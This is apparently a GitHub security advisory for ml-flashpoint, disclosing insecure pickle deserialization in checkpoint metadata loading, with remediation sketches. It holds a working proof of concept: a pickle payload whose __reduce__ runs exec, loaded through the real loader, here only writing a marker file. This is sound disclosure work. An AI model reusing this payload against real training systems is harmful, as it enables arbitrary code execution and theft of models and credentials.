
[Security Vulnerability] Insecure Pickle Deserialization in Checkpoint Metadata Loading ml-flashpoint #74

@hayageek

Summary

DefaultMLFlashpointCheckpointLoader.read_metadata() in src/ml_flashpoint/core/checkpoint_loader.py uses pickle.load() to deserialize .metadata files from checkpoint directories. These files can originate from untrusted peer nodes in a distributed training cluster (via ReplicationManager.sync_bulk_retrieve) or from shared storage. An attacker who controls a peer node or can write to shared checkpoint storage can craft a malicious pickle payload that achieves arbitrary code execution on any node that loads the checkpoint metadata.

Description

  • Type: Insecure Deserialization (CWE-502)
  • Source: .metadata files read from Path(checkpoint_id.data) / object_name (line 152). In distributed deployments, these files arrive via sync_bulk_retrieve from peer nodes over the network, or from shared filesystem storage accessible to multiple nodes.
  • Sink: pickle.load(f) at lines 154-155 of checkpoint_loader.py. No validation, allowlisting, or sandboxing is applied to the deserialized data.
  • Impact: Arbitrary code execution with the privileges of the ML training process. An attacker can exfiltrate model weights, training data, credentials, or pivot to other systems in the cluster. In multi-tenant or federated training scenarios, a single compromised or malicious participant can compromise all other nodes.

Attack Vectors

  1. Malicious peer node: In a distributed training cluster, _try_retrieve_object_if_missing() calls sync_bulk_retrieve() to fetch checkpoint objects from peer nodes. A compromised peer can serve a crafted .metadata pickle payload. When any other node calls read_metadata() (triggered by _compute_retrieval_plan() or get_latest_complete_checkpoint()), the malicious pickle executes arbitrary code.

  2. Shared storage poisoning: In shared-storage deployments, an attacker with write access to the checkpoint directory can replace or inject a malicious .metadata file. Any node loading that checkpoint will execute the payload.
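As a defense-in-depth illustration for the shared-storage vector, the sketch below authenticates metadata bytes with an HMAC before they reach any deserializer. It is not part of ml-flashpoint: `sign`, `verify`, and the key handling are hypothetical, and it assumes a secret key is provisioned out of band to trusted nodes only. It does not help against a compromised peer that already holds the key.

```python
import hashlib
import hmac

# Length of an HMAC-SHA256 tag in bytes.
TAG_SIZE = hashlib.sha256().digest_size


def sign(payload: bytes, key: bytes) -> bytes:
    """Return the payload prefixed with its HMAC-SHA256 tag (hypothetical helper)."""
    return hmac.new(key, payload, hashlib.sha256).digest() + payload


def verify(blob: bytes, key: bytes) -> bytes:
    """Return the payload if its tag matches, otherwise raise ValueError.

    Call this BEFORE handing the bytes to any deserializer.
    """
    tag, payload = blob[:TAG_SIZE], blob[TAG_SIZE:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    # compare_digest avoids leaking the mismatch position through timing.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("metadata failed integrity check")
    return payload
```

A writer would store `sign(serialized_metadata, key)`, and a reader would call `verify()` on the raw file contents and deserialize only the returned payload.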

Affected

  • Package: ml-flashpoint (pip)
  • Repository: google/ml-flashpoint
  • File: src/ml_flashpoint/core/checkpoint_loader.py
  • Function: DefaultMLFlashpointCheckpointLoader.read_metadata() (lines 147-158)
  • Versions: All versions (as of commit on main branch)

PoC

A proof-of-concept demonstrates arbitrary code execution by crafting a malicious .metadata pickle file that writes a marker file when deserialized.

payload.py — generates a malicious .metadata file using pickle.dump() with a class that overrides __reduce__ to execute arbitrary code:

import os
import pickle

POC_DIR = os.path.dirname(os.path.abspath(__file__))
CHECKPOINT_DIR = os.path.join(POC_DIR, "fake_checkpoint")
METADATA_FILE = os.path.join(CHECKPOINT_DIR, ".metadata")


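class MaliciousPayload:
    # pickle calls __reduce__ when serializing; on load, the unpickler
    # invokes the returned callable (exec) with the returned arguments.
    def __reduce__(self):
        return (exec, ("open('pwned.txt','w').write('pwned')",))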


def generate():
    os.makedirs(CHECKPOINT_DIR, exist_ok=True)
    with open(METADATA_FILE, "wb") as f:
        pickle.dump(MaliciousPayload(), f)
    return METADATA_FILE

exploit.py — invokes the real DefaultMLFlashpointCheckpointLoader.read_metadata() from the built ml-flashpoint package:

import os
import sys

POC_DIR = os.path.dirname(os.path.abspath(__file__))
CHECKPOINT_DIR = os.path.join(POC_DIR, "fake_checkpoint")
sys.path.insert(0, POC_DIR)

import payload
from ml_flashpoint.core.checkpoint_id_types import CheckpointContainerId
from ml_flashpoint.core.checkpoint_loader import DefaultMLFlashpointCheckpointLoader

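# Remove any marker left over from a previous run.
if os.path.exists("pwned.txt"):
    os.remove("pwned.txt")

# Write the malicious .metadata file, then load it through the real loader.
payload.generate()
loader = DefaultMLFlashpointCheckpointLoader(None, None)
loader.read_metadata(CheckpointContainerId(CHECKPOINT_DIR), ".metadata")

# The marker file exists only if the payload ran during pickle.load().
if os.path.exists("pwned.txt"):
    with open("pwned.txt") as f:
        print("EXPLOIT_SUCCESS:", f.read())
else:
    sys.exit(1)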

Running the exploit creates pwned.txt, proving arbitrary code execution via pickle.load() in read_metadata().

Remediation

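Replace pickle.load() with a safe deserialization method: for example, a data-only format such as JSON, or a pickle.Unpickler subclass whose find_class() allowlists only the classes that checkpoint metadata legitimately contains.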
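One possible shape for such a fix is the allowlisting pattern from the Python `pickle` documentation ("Restricting Globals"). This is a minimal sketch, not the project's actual patch: `RestrictedUnpickler`, `restricted_load`, and the contents of `ALLOWED_GLOBALS` are assumptions, and the real allowlist would have to be derived from the types the metadata actually uses.

```python
import collections
import io
import pickle

# Hypothetical allowlist of (module, name) pairs that metadata may reference.
# The real set depends on the metadata schema and is an assumption here.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global outside the allowlist."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowed")


def restricted_load(f):
    """Drop-in analogue of pickle.load() that enforces the allowlist."""
    return RestrictedUnpickler(f).load()


if __name__ == "__main__":
    data = pickle.dumps(collections.OrderedDict(step=10))
    print(restricted_load(io.BytesIO(data)))
```

With this in place, a payload like the PoC's is rejected when the unpickler tries to resolve `builtins.exec`, before the callable is ever invoked. An allowlist is only as safe as its entries, so it should never include callables that can run arbitrary code.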
